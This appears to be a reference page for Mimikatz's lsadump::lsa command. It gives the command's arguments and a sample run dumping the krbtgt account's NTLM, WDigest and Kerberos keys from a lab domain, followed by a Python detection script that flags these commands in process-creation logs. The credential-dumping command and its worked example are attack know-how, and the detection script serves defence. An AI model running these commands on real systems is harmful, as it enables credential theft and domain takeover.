lsa
lsadump::lsa extracts hashes from memory by asking the LSA server. The patch or inject takes place on the fly. It has the following command line arguments:
  • /name or /user : the target user account
  • /id : the RID (relative identifier) for the target account (500 for Administrator)
  • /patch : dumps only the LM and NT password hashes
  • /inject : when run on a workstation, it will dump the LM and NT password hashes. When run on a domain controller, it will dump LM, NT, WDigest, Kerberos keys and password history.
LM and NT hashes are used to authenticate accounts using the NTLM protocol. These hashes are often called the "NTLM hash", and much documentation, many blog posts and many tools mix the terms. In this case, "NTLM" refers to the NT hash.
This command requires elevated privileges (by previously running privilege::debug or by executing Mimikatz as the NT-AUTHORITY\SYSTEM account).
```
mimikatz # lsadump::lsa /inject /name:krbtgt
Domain : hacklab / S-1-5-21-2725560159-1428537199-2260736313

RID : 000001f6 (502)
User : krbtgt

* Primary
NTLM : b5348d0a20a24a67ff544146a09cd292
LM :
Hash NTLM: b5348d0a20a24a67ff544146a09cd292
ntlm- 0: b5348d0a20a24a67ff544146a09cd292
lm - 0: 90e43747fb3e2459bc0fbd4c64a48ab4

* WDigest
01 96336fb9042f4823a864a9a9ea953d92
02 f02b41fe320a26b54de6278bf432ea6b
03 c4d6aef8b8382e686fdf2d8bb9ed4325
04 96336fb9042f4823a864a9a9ea953d92
05 f02b41fe320a26b54de6278bf432ea6b
06 6db8e37630a2ccb50d640b7e0575a75d
07 96336fb9042f4823a864a9a9ea953d92
08 eca32a7c67f70dcd78116b548428644a
09 eca32a7c67f70dcd78116b548428644a
10 65ff3b022e3c992e06672a9013e9e375
11 2faee2bbb7f3ce7eea4da160314992c1
12 eca32a7c67f70dcd78116b548428644a
13 8208f726be15c605b1d9531b3f6ceb68
14 2faee2bbb7f3ce7eea4da160314992c1
15 4097da3573ce0e22b396f673cb338223
16 4097da3573ce0e22b396f673cb338223
17 fa880afaaeb637fafed4121f58ae1c0e
18 20ad95aaa3a05e5bb731bfefbd7ee823
19 d46bc56e4021f6410468193dc7d05e58
20 4d01f91984530f183381bdf5f0605f63
21 1b415947d31439c2e59ecb8a0cd3daeb
22 1b415947d31439c2e59ecb8a0cd3daeb
23 0c54e140ce4d3af2150f66672338f6f3
24 12f6af7e274f18cc1299f792f81610f8
25 12f6af7e274f18cc1299f792f81610f8
26 b68781315989472c4536e52359a0c999
27 293f6790b0e67296db60f201ef15d75b
28 18b300eeed3faeb12fe39754ec4537ef
29 b00feb2fe6a6218228116b62612d6946

* Kerberos
Default Salt : HACKLAB.LOCALkrbtgt
Credentials
des_cbc_md5 : 97ec73858998ae68

* Kerberos-Newer-Keys
Default Salt : HACKLAB.LOCALkrbtgt
Default Iterations : 4096
Credentials
aes256_hmac (4096) : 3ab45a59d37a5a647e0d7d9d942d0e8b77911cff0bd95b16e203cd9503ccdd96
aes128_hmac (4096) : 3c8fc2890213fb9be3d6fb139b1be881
des_cbc_md5 (4096) : 97ec73858998ae68

* NTLM-Strong-NTOWF
Random Value : 48d7d89c1608b83db8c568251f8b810f
```
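A detection sketch for the invocation documented above, added here as an example and not taken from the original page or from Mimikatz: it scans process-creation events for the command strings this page names, extracts the /inject, /patch, /name, /user and /id arguments, and rates the finding by target account. Event field names follow Sysmon Event ID 1; the sample events, host names and the user admin1 are constructed.

```python
import re

# Command strings named on this page, matched case-insensitively.
LSA_CMD = re.compile(r'lsadump::lsa\b(?P<args>[^"]*)', re.IGNORECASE)
DEBUG_CMD = re.compile(r'privilege::debug\b', re.IGNORECASE)
ARG = re.compile(r'/(?P<key>\w+)(?::(?P<val>[^\s"/]+))?')

# RID 500 is named on the page; 502 is krbtgt in its sample output.
SENSITIVE_RIDS = {"500": "Administrator", "502": "krbtgt"}
SENSITIVE_NAMES = {"administrator", "krbtgt"}

def classify(command_line):
    """Return a finding dict for an lsadump::lsa invocation, else None."""
    m = LSA_CMD.search(command_line)
    if m is None:
        return None
    args = {a["key"].lower(): a["val"] for a in ARG.finditer(m["args"])}
    name = args.get("name") or args.get("user")
    rid = args.get("id")
    mode = next((k for k in ("inject", "patch") if k in args), "unspecified")
    sensitive = (name or "").lower() in SENSITIVE_NAMES or rid in SENSITIVE_RIDS
    return {
        "mode": mode,
        "target": name or SENSITIVE_RIDS.get(rid) or (f"RID {rid}" if rid else "unspecified"),
        "debug_privilege_requested": bool(DEBUG_CMD.search(command_line)),
        "severity": "critical" if sensitive else "high",
    }

def scan(events):
    """Return findings for matching process-creation events."""
    out = []
    for ev in events:
        finding = classify(ev.get("CommandLine", ""))
        if finding:
            out.append({**finding, "host": ev["Computer"], "user": ev["User"]})
    return out

# Constructed sample events; the second uses a renamed binary and mixed case.
SAMPLE_EVENTS = [
    {"Computer": "DC01", "User": "HACKLAB\\admin1", "Image": r"C:\Temp\mimikatz.exe",
     "CommandLine": 'mimikatz.exe "privilege::debug" "lsadump::lsa /inject /name:krbtgt" exit'},
    {"Computer": "WS07", "User": "NT AUTHORITY\\SYSTEM", "Image": r"C:\Users\Public\m.exe",
     "CommandLine": 'm.exe "LSADUMP::LSA /patch /id:500" exit'},
    {"Computer": "WS07", "User": "HACKLAB\\bob", "Image": r"C:\Windows\System32\net.exe",
     "CommandLine": "net user bob /domain"},
]
if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f)
```

Commands typed at the interactive `mimikatz #` prompt never reach process-creation logs, so this covers only invocations passed on the command line and should be paired with other telemetry.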